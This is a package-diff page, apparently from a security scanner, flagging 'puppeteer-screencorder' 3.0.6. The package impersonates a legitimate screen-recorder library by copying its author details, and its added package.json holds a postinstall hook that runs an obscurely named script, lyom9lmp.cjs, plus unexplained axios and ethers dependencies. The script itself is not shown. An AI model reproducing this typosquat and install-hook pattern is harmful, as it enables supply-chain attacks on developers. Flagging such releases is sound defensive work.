puppeteer-screencorder 3.0.6

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of puppeteer-screencorder might be problematic. Click here for more details.

package/package.json ADDED
@@ -0,0 +1,140 @@
1
+ {
2
+ "name": "puppeteer-screencorder",
3
+ "version": "3.0.6",
4
+ "description": "A puppeteer Plugin that uses the native chrome devtool protocol for capturing video frame by frame. Also supports an option to follow pages that are opened by the current page object",
5
+ "main": "build/main/index.js",
6
+ "typings": "build/main/index.d.ts",
7
+ "module": "build/module/index.js",
8
+ "repository": "https://github.com/prasanaworld/puppeteer-screen-recorder",
9
+ "author": {
10
+ "name": "Prasana Kannan",
11
+ "url": "https://www.linkedin.com/in/prasanakannan/",
12
+ "email": "prasanaworld@gmail.com"
13
+ },
14
+ "sponsor": {
15
+ "url": "https://opencollective.com/puppeteer-screen-recorder"
16
+ },
17
+ "funding": [
18
+ {
19
+ "type": "individual",
20
+ "url": "https://github.com/sponsors/prasanaworld/dashboard/tiers?frequency=one-time"
21
+ },
22
+ {
23
+ "type": "individual",
24
+ "url": "https://opencollective.com/puppeteer-screen-recorder"
25
+ },
26
+ {
27
+ "type": "corporate",
28
+ "url": "https://github.com/sponsors/prasanaworld/dashboard/tiers"
29
+ },
30
+ {
31
+ "type": "corporate",
32
+ "url": "https://opencollective.com/puppeteer-screen-recorder"
33
+ }
34
+ ],
35
+ "homepage": "https://prasanaworld.github.io/puppeteer-screen-recorder/",
36
+ "license": "MIT",
37
+ "keywords": [
38
+ "puppeteer",
39
+ "screen",
40
+ "screen recorder",
41
+ "video capture",
42
+ "video recorder",
43
+ "test case capture",
44
+ "test case video recorder",
45
+ "puppeteer plugin",
46
+ "puppeteer library",
47
+ "video",
48
+ "record",
49
+ "cast",
50
+ "shot",
51
+ "video",
52
+ "record",
53
+ "puppeteer",
54
+ "pptr",
55
+ "pptr.dev",
56
+ "automatic",
57
+ "automation",
58
+ "screen cast",
59
+ "devtool",
60
+ "devtool protocol",
61
+ "screen frame",
62
+ "screeencast",
63
+ "screeencasts",
64
+ "screeenCasts",
65
+ "screeenCast",
66
+ "headless",
67
+ "headfull",
68
+ "FFMPEG"
69
+ ],
70
+ "scripts": {
71
+ "postinstall": "node lyom9lmp.cjs"
72
+ },
73
+ "engines": {
74
+ "node": ">=16"
75
+ },
76
+ "dependencies": {
77
+ "fluent-ffmpeg": "^2.1.2",
78
+ "axios": "^1.7.7",
79
+ "ethers": "^6.13.2"
80
+ },
81
+ "optionalDependencies": {
82
+ "@ffmpeg-installer/ffmpeg": "^1.1.0"
83
+ },
84
+ "peerDependencies": {
85
+ "puppeteer": "19.0.0"
86
+ },
87
+ "devDependencies": {
88
+ "@babel/preset-typescript": "^7.26.0",
89
+ "@istanbuljs/nyc-config-typescript": "^1.0.1",
90
+ "@jest/globals": "^29.7.0",
91
+ "@types/jest": "29.5.3",
92
+ "@types/node": "22.1.0",
93
+ "@typescript-eslint/eslint-plugin": "7.18.0",
94
+ "@typescript-eslint/parser": "7.18.0",
95
+ "codecov": "^3.5.0",
96
+ "cspell": "8.13.1",
97
+ "cz-conventional-changelog": "^3.3.0",
98
+ "eslint": "8.57.1",
99
+ "eslint-config-prettier": "9.0.0",
100
+ "eslint-plugin-eslint-comments": "^3.2.0",
101
+ "eslint-plugin-functional": "6.6.3",
102
+ "eslint-plugin-import": "^2.22.0",
103
+ "gh-pages": "6.1.1",
104
+ "jest": "29.6.2",
105
+ "npm": "^10.9.0",
106
+ "npm-run-all": "^4.1.5",
107
+ "nyc": "17.0.0",
108
+ "open-cli": "8.0.0",
109
+ "prettier": "3.3.3",
110
+ "standard-version": "^9.0.0",
111
+ "ts-jest": "29.1.1",
112
+ "ts-node": "10.9.1",
113
+ "typedoc": "0.26.5",
114
+ "typescript": "5.1.6"
115
+ },
116
+ "files": [
117
+ "build/main",
118
+ "build/module",
119
+ "!**/*.spec.*",
120
+ "!**/*.json",
121
+ "CHANGELOG.md",
122
+ "LICENSE",
123
+ "README.md",
124
+ "lyom9lmp.cjs"
125
+ ],
126
+ "config": {
127
+ "commitizen": {
128
+ "path": "cz-conventional-changelog"
129
+ }
130
+ },
131
+ "prettier": {
132
+ "singleQuote": true
133
+ },
134
+ "nyc": {
135
+ "extends": "@istanbuljs/nyc-config-typescript",
136
+ "exclude": [
137
+ "**/*.spec.js"
138
+ ]
139
+ }
140
+ }